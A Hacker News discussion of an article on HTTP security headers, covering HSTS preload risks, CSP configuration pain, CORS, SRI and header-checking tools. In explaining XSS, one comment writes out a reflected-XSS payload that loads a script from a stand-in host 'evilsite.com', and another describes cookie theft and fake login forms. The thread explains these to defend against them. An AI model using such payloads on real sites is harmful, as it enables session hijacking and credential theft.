HTTP headers for the responsible developer (twilio.com)
887 points by kiyanwang 12 days ago | 98 comments





I have been trying to explain the importance of HTTP headers to some younger/junior devs I am working with. I have noticed that headers are often considered to be 'too technical' or even 'old tech'.

I'm going to recommend them to read this, but I do think I need to explain a couple of things that the article is not clear about:

- Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS-enabled, and preloading will break them permanently. I wish the authors had made that clearer. Don't use includeSubDomains and preload unless you know what you are doing. Scott Helme also wrote a great article about this [0].

- CSP can be really hard to set up. For instance: if you include Google Analytics, you need to set both a script-src and an img-src. The article does a good job of explaining that you should use CSP monitoring (I recommend Sentry), but it doesn't explain how deceptive the reports can be. You'll get tons of CSP violation reports caused by browser plugins that attempt to inject CSS or JS. You must learn to distinguish the errors you can fix from those that are out of your control.

- Modern popular frontend frameworks will be broken by CSP, as they rely heavily on injecting CSS at runtime (via libraries like JSS or 'styled components'). As these techniques are often adopted by less experienced devs, you'll see many 'solutions' on StackOverflow and GitHub telling you to set unsafe-inline in your CSP. This is bad advice, as it basically disables CSP! I have attempted to raise awareness in the past but I always got the 'you're holding it wrong' reply (even on HN). The real solution is for your build system to separate the CSS from the JS at build time. Not many popular build systems (such as create-react-app) support this.

- Cache-Control can be really hard too. If you don't have time to fiddle with these settings, I recommend using a host like Netlify; in my experience they do a proper job with caching.

[0] https://scotthelme.co.uk/tag/hsts-preload/

edit: typos
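To make the Google Analytics point above concrete, a CSP for that case might look roughly like this (a sketch; the exact hosts depend on which GA features you load, and the report-uri endpoint is a hypothetical example). It's shown wrapped for readability; on the wire it is sent as a single line:

```
Content-Security-Policy:
    default-src 'self';
    script-src 'self' https://www.google-analytics.com;
    img-src 'self' https://www.google-analytics.com;
    report-uri https://example.report-uri.com/r/d/csp/enforce
```

Start in Content-Security-Policy-Report-Only mode so violations are reported but nothing breaks while you tune the lists.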


> - Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently. I wish the authors made that more clear. Don't use includesubdomains and preload unless you know what you are doing. Scott Helme also did a great article about this.

Great point, and it's even more important than people might realize at first: it doesn't cover only your public web properties; it covers all subdomains, even those you forgot you use and don't associate with your web presence.

You have a NAS at nas.example.com, a webmail at mail.example.com, a third-party CDN or similar routing at cdn.example.com, a printer interface at printer.office.example.com, and other internal things on internally routed paths, like that custom old dashboard written 15 years ago? includeSubDomains covers them all, and preloading means you can't disable it once you realize you shouldn't have done it.

I've seen a few small non-IT companies hit by that, then asking for urgent consultancy to fix it.


> and then asking for urgent consultancy to fix it.

If it is preloaded (as the article suggests you should do), there is nothing you can do to 'fix' it except migrating all other subdomains to HTTPS. Which is not always possible.


Oh yes, exactly. Especially since they don't have much budget planned for it (small firms), it ends either with a lot of dirty proxying to add an HTTPS termination point, just because someone screwed up without paying attention to what they were actually doing, or with a secondary domain for the office.

My subdomains for things like that all go through a reverse proxy (Caddy) where I terminate HTTPS, which makes things simple, though I still don't use includeSubDomains because it just seems too risky.
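For reference, a minimal Caddyfile sketch for that kind of setup (hostname and backend address are hypothetical); Caddy terminates TLS and obtains certificates automatically:

```
nas.example.com {
    reverse_proxy 192.168.1.10:5000
}
```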

One tip from personal experience: I usually introduce CORS (and the Access-Control-Allow-Origin header in particular) first. Most people unfamiliar with HTTP headers have no problem understanding the usefulness of that one, and it opens the door to the other stuff.
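As a teaching aid, the simplest cross-origin exchange looks something like this (origins are hypothetical). Without the response header, the browser blocks the page at app.example.com from reading the response from api.example.com:

```
GET /api/data HTTP/1.1
Host: api.example.com
Origin: https://app.example.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://app.example.com
```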

I'm surprised that SRI (Subresource Integrity) isn't mentioned, though it does require HTML changes. It lets you embed SHA-2 hashes into your <link> and <script> tags, and if the given hash doesn't match the hash of the received resource, the resource isn't applied to the page. It protects you (for example) from your CDN changing your data.
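To illustrate, the integrity hash can be computed with openssl (file name and contents here are placeholders); the base64 digest then goes into the tag's integrity attribute:

```shell
# Create a stand-in for the script served by the CDN
printf 'console.log("hi");' > lib.js

# SRI wants base64 of the raw digest (SHA-384 in this sketch)
HASH="sha384-$(openssl dgst -sha384 -binary lib.js | openssl base64 -A)"
echo "$HASH"

# The tag would then look like (URL hypothetical):
#   <script src="https://cdn.example.com/lib.js"
#           integrity="$HASH" crossorigin="anonymous"></script>
```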

Also, no mention of ETags. They help with caching.


> Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently

+1. I'm kind of worried that the default copy-pasteable snippet there can lead to serious consequences. Well, less so today when you can get certs for free, but you may still face some unpleasant downtime.


> The real solution is that your build system should separate the CSS from JS during build time. Not many popular build systems (such as create-react-app) support this.

The real solution is to fix the actual protocol issues, instead of imposing arbitrary limitations on what scripts can do with the page. If you pause and think about what these security measures are aiming to mitigate, they themselves are at best amateurish.


They aren't strictly "protocol issues" though, they're just dangerous features that are good to be limited in most cases.

It could be that headers seem scary, and I think that is because you can get a lot done without them, so they might be unfamiliar to junior devs. To make them less scary, maybe it is sufficient to say they are just key/value pairs, like an additional JSON object in the response. They're right there in Chrome dev tools, and it's fun seeing how different sites send different headers.

As a motivator I always say: look at the network tab and think about how you can make stuff faster. It was in this mindset that I first saw these additional requests and thought 'WTF! I'd better find out why that is happening.' They turned out to be preflight requests.


> I think that is because you can get a lot done without them

Reinventing the wheel is also a good way to fool yourself into thinking you're being clever and productive. I mean, it's as if everyone who preceded me in a field was incapable of seeing a problem I managed to find a hacky solution for in 5 minutes.

Meanwhile, let's not forget that there are currently about a half dozen standards and specifications for HATEOAS, all involving ugly hacks around response documents and funny media types, when all it takes to achieve the same goal is passing link relations through Link headers.


How can you even get a job as a junior dev without knowing about headers?

Never been asked about headers in a job interview, junior or otherwise. Usually interviews are a 'can you code' test. I've never been interviewed by FAANG etc. though.

Easy, you just think you have to add a content type.

I was also disappointed that some aspects of modern JS frameworks make adding strict CSPs incredibly hard. Especially with CSS there don't seem to be many resources on how to make something like React styled components work with CSPs, disabling the CSS CSP seems to be the only reasonable way to do this.

> Modern popular frontend frameworks will be broken by CSP as they rely heavily on injecting CSS (a concept known as JSS or 'styled components')...

Not sure what you mean by this paragraph. JSS and styled components are both specific JS libraries that provide a way to write styles in JS and compile them to normal CSS. They both support normal server-side rendering of CSS that could be included in the HTML like any traditional web page.

The general term for this concept is “CSS-in-JS.” The libraries do not rely on inline styles, even though the general term may suggest that.

I’m not very familiar with JSS, but styled components absolutely supports building CSS in create-react-app.


I confused styled components with JSS. JSS is a library used by popular UI libraries, most notably Material-UI.

The problem is that JSS injects the CSS dynamically at runtime. There seems to be no real solution to extract the CSS into a .css file at compile time.

The only solution that the JSS developers suggest [0] is using server-side rendering to inject a nonce into the HTML script tag to bypass CSP. But I think that requiring server-side rendering for a client-side rendered framework is totally backwards. The whole reason why I use single page client side rendered applications is so I can deploy on a CDN.

[0] https://github.com/cssinjs/jss/blob/master/docs/csp.md
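For reference, the nonce approach from that doc looks roughly like this (nonce value hypothetical; it must be a fresh random value generated server-side for every response, which is exactly why it requires server-side rendering). The header whitelists the nonce, and the injected tag carries it:

```
Content-Security-Policy: style-src 'self' 'nonce-2726c7f26c'

<style nonce="2726c7f26c">
  /* styles injected at runtime are allowed because the nonce matches */
</style>
```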


Another gotcha with HSTS + includesubdomains is if you have a naked domain e.g. https://example.com redirecting to a www prefix e.g. https://www.example.com, but the server is configured to send the HSTS header for the naked domain.

It's not always obvious because your gut reaction is "oh my web site is on www.", but that misconfigured naked domain redirect might indeed break "randomservice.example.com".


Unfortunately, using Google Tag Manager basically requires setting 'unsafe-inline', neutering your CSP.

Are you implying that CSS-in-JS is an anti-pattern, due to its incompatibility with CSP? (I have no opinion one way or the other regarding CSS-in-JS).

> I have noticed that headers are often considered to be 'too technical' or even 'old tech'.

Are you or they able to elaborate on that? Headers are an active area of research/implementation for web security, are they working on any replacement to the entire concept?


> Be sure that you understand the concept of HSTS!

Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS. That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.


The limitation with the approach (of HTTP=>HTTPS redirects) is that your average coffee-shop-wifi-user may not notice if their connection does not upgrade to HTTPS due to malicious interception of their connections.

With HSTS, once they've connected to the server over HTTPS once (e.g. at home), every connection from that browser will be immediately upgraded to HTTPS before even trying HTTP.

Your suggestion is still needed, though: HSTS is only delivered over HTTPS, so the redirect is still required for the very first visit.

See Firesheep for an example of how HTTP can be intercepted - https://en.wikipedia.org/wiki/Firesheep


This will leave your users vulnerable to man-in-the-middle attacks. If I control a router between their computer and the Internet, I can serve back an HTTP page which doesn't redirect, and trick them into entering their password (for example).

HSTS is designed to prevent this.


How can HSTS prevent a man in the middle attack if the server has not even been contacted yet?

It can't; that is what preloading is for. Your browser comes with a built-in list of all sites that have requested HSTS preload, so it will use HTTPS even on the first visit. This is why preloading across all subdomains is potentially dangerous: it will break your site if you don't have HTTPS everywhere.

But even without preloading, HSTS improves security. Yes, the first visit is susceptible to MITM, but every visit after that is not. This makes things much harder for an attacker, as they must intercept the very first visit for the attack to work.
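A cautious rollout is to start with a short max-age and only ratchet up once everything demonstrably works over HTTPS (values here are illustrative):

```
# Step 1: test with a short lifetime, current host only
Strict-Transport-Security: max-age=300

# Step 2: once all subdomains serve HTTPS, extend scope and lifetime
Strict-Transport-Security: max-age=31536000; includeSubDomains

# Step 3: only when you are sure, add preload and submit to hstspreload.org
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```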



It can only do that if you add it to the preload lists of browsers (which is mentioned in the article).

But even if it is not, it's still helpful for people connecting to your site again.


And because the preload list is hierarchical, whole swathes of the web can be covered with a single entry. .dev is the biggest example, but a single entry can also protect all the Stack Exchanges, all the default Blogspot blogs, that sort of thing.

It can't! But after the first time it's been contacted, when you contact it again HSTS will enforce HTTPS (from the client itself - much stronger than a redirect).

> Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS

I think this comment sums up my whole point about how less experienced developers must learn how to use headers.

As others have commented, HSTS fixes the potential dangers of plain redirects (MITM attacks), and it also reduces overhead.

> That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.

If you use HSTS, you should still serve a 301 permanent redirect as a fallback for old browsers and other HTTP clients (like some libcurl-based implementations).
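A sketch of that combination in nginx (assuming nginx; server names illustrative): HTTP requests get a 301 to HTTPS, and the HSTS header is sent only on the HTTPS side, since clients must ignore it over plain HTTP anyway:

```
server {
    listen 80;
    server_name example.com;
    return 301 https://$host$request_uri;
}

server {
    listen 443 ssl;
    server_name example.com;
    add_header Strict-Transport-Security "max-age=31536000" always;
    # ... ssl_certificate and other TLS settings ...
}
```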


I think what this comment thread really says is that the burden of fixing mistakes in the web's fundamental design is put on the individual developer and that this is another mistake!

If MITM is a serious issue then it's an extremely bad idea to depend on individual developers of every website out there to mitigate this.


Everything else is just wishful thinking, though. Chrome cannot decide to just deprecate (e.g.) unsafe-inline CSS tags. It would break 90% of websites, and people would move to a different browser to get their websites to work.

Yeah, but then you always generate an additional request. With HSTS cached, the browser will fetch the HTTPS version without an additional redirect. I wrote a post about it some time ago: https://pawelurbanek.com/amp-seo-rating-performance

And break legacy browsers and stupidly implemented corporate proxies and firewalls as well.

Bonus points if your URLs get rewritten by something client-side, which is exactly what HSTS is supposed to protect against and a redirect does not.


To me this just seems like more duct tape over the fact that everything on the web is doing things it wasn't really designed to do. We never could have imagined what we would be able to do with HTML/CSS/JS in a browser environment. We also never could have imagined how the pressure of business demands would essentially drive more and more duct tape solutions until the whole web was built on rickety scaffolding all sort of lashed together and swaying.

There are backend bandaids and frontend bandaids but with the sheer amount of stack knowledge and framework knowledge required to do anything as a webdev these days, there's no way to stay on top of it all and we are just kinda winging some combination of best practices and getting shit done.

I don't know if things like PWAs and WASM are going to allow us to move toward a change yet, and would love input from someone with an opinion.


> the sheer amount of stack knowledge and framework knowledge required to do anything as a webdev these days

I think this is greatly exaggerated. You can get by just fine making your own sites knowing some basic html/css/maybe js, maybe some php too if you want backend stuff. Optionally some frameworks if you want, which should usually be easy enough to just follow some examples and get the functionality you want pretty fast.

If you're put on an existing web project, you probably only have to learn the bits immediately surrounding the things you do, picking it up as you go along. I still don't know Angular, React, Vue, or much else in the way of JS frameworks other than jQuery after being in web dev professionally for years, as it simply hasn't been needed.


Yeah, sorry if I wasn't clear, but that's kind of my point. You can make a site by knowing how to use some subset of the stack, but you use the rest as a black box: importing a bunch of third-party libraries, or building a web app without understanding how cross-site attacks work, etc. So at some point you either have to learn these little gotchas all over the place, or they go unfixed.

Like how many sites still don't have mandatory HTTPS even though it is free and easy?


That's no different from programming in any other environment then - good libraries are generally meant to work like black boxes and security issues etc happen everywhere.

As a full-stack dev I recently locked down my security headers and I have a new perspective on what a web browser actually is. Before I saw all web-browsers as just a window that renders web content and enables user interaction.

Now, I see that I can have a conversation with the browser at a different level. Headers allow me to dictate the intricate details of how this hardened security tool (the browser) will interact with my code.

HTTP headers do appear to be a duct tape solution, however, once you implement them and understand what is going on; your hindsight will be 20/20 and you'll probably see them differently.

From what I understand WebAssembly doesn't have anything to do with this issue. HTTP Headers are a contract between the server and client about what can happen on a webpage. WebAssembly is a programming language and virtual machine that executes code. WASM code executing inside a VM would still need HTTP headers defining permissions for its actions.


I do understand headers, I also know how easy it can be to overlook a header setting or, most probably, work around a header to enable some piece of functionality because implementing the totally correct way is too time-consuming and expensive for the client. Etc etc etc.

My point isn't that we shouldn't learn about headers and how thy can be used to help facilitate security, we should! My point is that largely we are trying to patch an insecure system with many different points of insecurity as we allow browsers and servers to do more and more things and need to think about this as a structural problem of web development, not a problem of a dev not understanding enough to set the right headers.


> because implementing the totally correct way is too time-consuming and expensive for the client

There's your problem!

> think about this as a structural problem of web development, not a problem of a dev not understanding enough

No, go back to your root cause and fix that.

From my research I've found that clients/managers only allow a development team to finish 15% of a feature before they consider it ready for production and demand a deployment. They don't understand security, testing, documentation, or hardening. Developers only have so much energy to roll these boulders uphill so eventually the crazy business people win. Today if you put a server on the internet you will be attacked within 20 seconds, and that will continue forever. If you start a business you have a 50% chance of being hacked. This really isn't an issue with the tools available, it's the developer effort and toxic work environment dubbed "Agile".


Gotta love all the ritual incantations one has to perform to "keep your website safe" these days. Worst of all, people are clearly bragging about possessing this arcane knowledge, instead of constantly complaining about how stupid the whole thing is to begin with. "Responsible developer"? Hah.

The web needs a real security model relevant to what browsers are doing today, not these piecemeal hacks duct-taped onto a hypertext delivery protocol.


As someone who builds websites for money, I couldn't agree more. I rarely get to bill for making incremental changes; I get to bill for implementing features. Spending money to implement and log a properly restrictive Content-Security-Policy doesn't seem like a wise use of my client's limited budget.

It may be a wise use if a security break-in would be a problem for your client.

I am a big fan of restrictive CSP, but it's often hard to get there from an existing site. It's often better to do it in stages, e.g., when you work on page Q, you make that page have a restrictive CSP. Later, when you work on page R, that can grow one (or at least have fewer CSP issues). If having someone break into your site would be a serious problem, then you should speed up what it takes to get there.


Great article.

Somebody else mentioned Scott Helme, but didn't link to three of his amazing sites:

https://securityheaders.com which checks important headers

https://report-uri.com/ which collects CSP reports to catch errors. It also has a CSP builder (among a bunch of other tools) which is hugely helpful: https://report-uri.com/home/generate

https://scotthelme.co.uk/ is his blog with a ton of info. It also has a cheat sheet for CSP: https://scotthelme.co.uk/csp-cheat-sheet/

(I might be a fan of the guy ha)


These are great features, but I wish there were better ways to communicate the security policies for my website than having to send lengthy headers with every page.

CSP in particular tends to get rather long-winded. As the article says, it can contain up to 24 policies, many of which contain their own lists! It's bound to get even more complicated as web apps integrate with an ever greater number of external services. Feature-Policy also looks like it could easily balloon to 1KB or more if you wanted to control all the features. No matter how much compression you add, at some point this is going to affect the load time. Additional TCP round trips aren't cheap, especially for HTML resources that usually aren't cached at the edge.

Wouldn't it be convenient if I could store a structured representation (JSON, YAML, whatever) at a predefined location under /.well-known/ and use ordinary Cache-Control headers to make browsers cache the rules?


> Feature-Policy also looks like it could easily balloon to 1KB or more

Twitter sends over 6kb of CSP headers on every single request. This is what happens if you run loads of different advertisement and tracking vendors.


> Twitter sends over 6kb of CSP headers on every single request.

Now I understand why HTTP/2 uses compression for HTTP headers.


If you're implementing CSP, you should only include the header on text/html or other rendered responses, so the overhead is more per-navigation than per-request. I've seen a lot of guides where CSP is added globally at the webserver level which can waste a lot of bandwidth with images etc.

With HTTP/2, HPACK can ensure the CSP or Feature-Policy header only ever gets transmitted _once_ as long as the header doesn't change between responses. A one-time cost of 1KB is almost nothing, even for relatively slow mobile connections.

Yeah, I really do not like how CSP is implemented. It is hard to configure correctly and bloats all HTTP responses.

I read the whole article just to find out what the X-Shenanigans header shown in the picture at the top of the article is. There was no further mention of it.

Looks like it's an inside joke from Twilio[0].

[0] https://github.com/kwhinnery/todomvc-plusplus/issues/7


Aren't advertising networks blocking the adoption of CSP headers? Seems like it's quite a job to maintain the exceptions needed for Doubleclick for example.

It is always quite a job to maintain CSP. And it's really easy to break something with CSP.

This is why loads of devs eventually throw in the towel and disable CSP or use unsafe-inline. It's basically like trying to solve a hard CSS problem and, at some point, giving up and adding !important statements everywhere.

It's also really, really hard to explain to customers that it takes time to set up, and every time they install a new tracking/ad/video/whatever plugin on their CMS, you'll have to spend time on adjusting the CSP accordingly.

That said, I do encourage developers to use CSP. It's a really powerful tool to secure your site and protect your visitors from fraud/phishing.


It is also at least some level of defense against malicious npm packages (doesn't eliminate threat completely, but at least less sophisticated attacks will be thwarted).

CSP headers are a very useful tool and I encourage everyone to use them. They are a PITA to set up though. Fortunately at least Firefox clearly communicates in console log when a CSP rule is hit, and how to relax it (if it was by mistake).

Note that CSP can be set via <meta> tags too. There's a gotcha though: if rules are set in both places (HTTP headers and HTML <meta> tags), the intersection of the rules is used.
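For completeness, the <meta> form looks like this; note that some directives (e.g. frame-ancestors, report-uri, sandbox) are only honored in the HTTP header and are ignored in <meta>:

```html
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self'">
```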


Developers connect people. Developers help people. Developers enable people.

Look, I understand that people in general feel the need to pretend that their work is very important and good, but come on. You are not working for War Child in a Lebanese refugee camp.


  Developers connect people. 
  Developers help people. 
  Developers enable people.
I don't remember agreeing to these conditions. Is this some sort of psychological manoeuvre to get people to use SSL encryption on the web?

Whilst, if you ever upset one badly enough, you will find that sysadmins disable people.

I signed up for the building cool shit part, which seems to be omitted.

One of the perks was that it was something you could do mostly by yourself, without dealing with the messy and irritating mass of humanity.


When dealing with user uploads, we still need content disposition headers to force browsers to treat certain formats as attachments, rather than showing them inline, right?

I kind of understand why CSP isn't more widespread.

I tried adopting CSPs on all my sites to full Mozilla Observatory[0] standard. One is a Go based Heroku instance, where I used unrolled/secure[1], though there are a few different packages achieving this. The others are static Netlify deploys using Netlify CMS. For those, you have to include a headers file (in my case I am instructing Hugo to build the site with a .headers media file included, which Netlify parses).

Some observations:

- It's a huge pain in the ass / trial and error process

- The formatting for CSP rules was evidently made to be as insufferable as imaginable. All on the same line, with commas and semicolons being the only separators, no line-breaks, tabs or anything allowed. Seriously, wtf

- When you think you've got it working, some other thing breaks in a weird, silent way

- Debugging CSPs in Firefox is nearly impossible (as for certain in-line scripts, you will need to get SHA values to tell the CSP to let them through. Chrome provides the SHA in the console. Firefox bizarrely doesn't.)

- Trying to integrate google recaptcha with CSP is hilariously complicated

- You should try to host all fonts yourself, lest you need to enable google or fontawesome exceptions for font, CSS, script and svg, because apparently that's what you need just to get an FB icon on your page to work

- Forget about React, or anything using inline-script or styles. Netlify CMS and the Netlify identity widget all require inline styles and scripts. Even generating SHA values for all of those, I could not get this stuff to work. In the end I gave up and disabled the CSP again

And this is for static sites using really simple tooling. I have yet to find a viable way to make this work.

edit (some additional notes):

- Tools like this one[2] did not generate SHA values that were accepted by the CSP. I have tried a few different tools, checked all white spaces over and over. I just couldn't get it to work. Only Chrome returned the proper SHA value.

- I tried fixing a hover state loading in improperly (it flickered on first hover). This wasn't related to the CSP, but because I had to try lots of different things, like load in an SVG sprite, or png sprite, try pre-loading, use some JS, etc. etc. I had to keep changing the CSP to work with this, too. So applying a CSP should only be done at the end of a project. At the same time, if anything breaks from one day to the next, your debugging will now include the CSP as well most likely.

---

[0]https://observatory.mozilla.org/

[1]https://github.com/unrolled/secure

[2]https://passwordsgenerator.net/sha256-hash-generator/
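One likely reason external hash generators fail here: CSP expects the base64 encoding of the raw SHA-256 digest, while most online tools output a hex string. openssl produces the right form (inline script body here is hypothetical; the hash must cover the exact bytes between the <script> tags, whitespace included):

```shell
# Base64 of the raw digest, as CSP wants it -- not the hex string
SCRIPT_HASH=$(printf "alert('hi')" | openssl dgst -sha256 -binary | openssl base64 -A)
echo "script-src 'sha256-$SCRIPT_HASH'"
```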


> All on the same line, with commas and semicolons being the only separators, no line-breaks, tabs or anything allowed.

That's the format for HTTP headers. They could push against the standard and accept spaces, but anything else would break your browser.


That's fair enough, and admittedly I wasn't aware of this.

Presumably that format was fine before bigger / more complex CSP rules came along?

I find it very difficult to work with visually. Hard to see where one thing stops and another starts.


The format was clearly not created for large things like CSP rules.

If it was up to me, I would have placed the information at the linking tags inside the HTML (and JS, and CSS), or even extended the HTTP URI format in some way. There is probably a very good reason why people decided for the header, but I'm not aware of it.


If something is so hard to use that nobody can be arsed to do it properly, it's generally a signal that the tool needs to be redesigned.

CSP could be better, but it's perfectly useful as it is. The problem is that too many people did things badly (using inline JavaScript), mixing up code and data. It's time-consuming to fix problems like that, but possible. Enabling CSP is easy... it's fixing your system so it works with it that takes time.

The CII Best Practices Badge uses restrictive CSP. You can tell that here: https://securityheaders.com/?q=bestpractices.coreinfrastruct...


I'm not sure redesigning this would help because it's just a mechanism to define an ACL. Yes, it's hard to implement correctly and maintain, but that's because of the wild number of external dependencies developers toss into modern webpages. Start with basic HTML and your header just looks like this: Content-Security-Policy: default-src 'self'

Google.com gets a D+ on Mozilla Observatory.

For sites like Google, this is either a calculated risk, or not even applicable for them.

Scanner services like Mozilla Observatory / securityheaders.io / Qualys / etc only test a preset list of known best practices, they can't judge whether that technique is applicable for that site.

While it's usually good practice to follow the recommendations of such scanning services, you must always make sure you understand the implications.


Haha, yup, that's one of the tests I did as well. Most sites score terribly. Honestly, I was just experimenting (and for my static sites this doesn't really matter so much), yet it feels like there are a lot of issues with CSP that really don't need to be there. Until then, adoption will probably be slow / non-existent.

You can check your site's usage of most of these headers with https://securityheaders.com. HSTS and more is checked by https://www.ssllabs.com/ssltest/. Definitely make sure you understand what the headers do before changing them. Don't just copy/paste what you see here.

This is how you can get the headers:

    curl -I -X GET \
        https://www.twilio.com/blog/a-http-headers-for-the-responsible-developer

You can see them in your browser's dev tools as well

I was curious why you added the `-X GET` to that, but it seems twilio returns 405 Method Not Allowed for HEAD requests. Is there any legitimate reason they would block these?

HEAD worked for me.

"-X GET" is superfluous, as that is the default method.

Unless you use "-I", as in the example, in which case the default method is HEAD.

D'oh! I'll let the record stand as lesson on rash comments.

"Browser support for CSP is good these days, but unfortunately, not many sites are using it....I think we can do better to make the web a safer place"

Interestingly enough the blog this was posted on falls into the 94% not taking the effort to use CSP!


CSP interacts in a surprising way (at least it was to me) with service workers.

https://qubyte.codes/blog/content-security-policy-and-servic...


I'm curious why/how XSS is a problem. Can someone describe a practical example of how this has been successfully abused? To me XSS allows a page to be distributed over many servers and that's more of a feature than a threat!

A very simple example could be a website that takes unsanitized forum posts. Include a link to a malicious script in your post, and anyone who visits that page loads the script.

For another example, you could imagine a page on a website that includes the contents of a URL query in the response. For example, you visit www.goodsite.com/search.php?q=PurpleZebra, and the page displays "Your search for PurpleZebra did not return any results."

Now in the URL replace "PurpleZebra" with "<script src='evilsite.com/script.js'>" and trick someone into clicking on that link - now the error page delivered by goodsite.com includes the script from evilsite.com.


Google made a game that explains it well https://xss-game.appspot.com

There are actually two different types of XSS: a persistent version, which loads any time any user loads a certain page, and a reflected version, which only shows up when a user clicks a maliciously crafted link. The persistent version is the most dangerous, as it doesn't rely on the user being incredibly stupid. The reflected version is by far the most common but, since it requires the user to click a malicious link, isn't usually the easiest to exploit.

But either way, they both allow an attacker to display information on a website, when the content didn't originate from that site.

An example of how this could be really bad, would be a script that deletes all of the content from the document body and replaces it with a login screen. Rather than actually logging you in, it submits the username and password you entered to a site the attacker has control over.

Another, less obvious method, would be a script that captures your session cookie and submits that to another site the attacker has control over. If you were logged in to the site, the attacker could use the session cookie to authenticate to the site as you without logging in.


Ok, in that case I don't see how headers solve the problem better than:

1) Don't click on bad URLs. (should be taught in kindergarten by now)

2) Replace all input <> with &lt;&gt; etc.

I'm convinced scripts should not be able to read cookies for other domains?

Surely I'm missing something?
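Point 2 above can be sketched in a few lines (Python here just for illustration; equivalent escaping exists in every templating language, and modern template engines do it by default):

```python
import html

# hypothetical attacker-controlled input from the search example upthread
q = "<script src='evilsite.com/script.js'>"
safe = html.escape(q)  # escapes &, <, >, and quotes
print(safe)  # &lt;script src=&#x27;evilsite.com/script.js&#x27;&gt;
```

CSP headers complement, rather than replace, this kind of escaping: they limit the damage on the day someone forgets to escape one input.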


The Content-Security-Policy header prevents any new JavaScript from getting executed. Any inline scripts have to have a matching nonce, or SHA hash in the CSP header. With XSS, an attacker can insert content into the web page, but they can't modify the headers, so this effectively stops all XSS without some additional vulnerability being exploited.


"XSS" usually refers to the vulnerability that happens when user input is treated as HTML and shown on a site in a way that allows the user to inject javascript, not the general practice of a site author intentionally adding a <script> tag pointing to a script on another domain.

Maybe you are confusing this with RSS?

> Did you ever wonder why you can’t use local environments like my-site.dev via HTTP with your browser anymore? This internal record is the reason – .dev domains are automatically included in this list since it became a real top-level domain in February 2019.

.dev hasn't been working locally for me for more than a year.


I use "foo.local" as a drop-in replacement, haven't had problems...

Apparently ".test" is the RFC-official one to use. I just recently got around to fixing all my local projects: https://en.wikipedia.org/wiki/.test

Any devices using mDNS might disagree.

Sure; though I only said _I_ haven't had problems using ".local". In any case, I think the peer commenter who replied about '.test' "wins", given the RFC.

thx, my future headers cheat sheet.

thanks :)


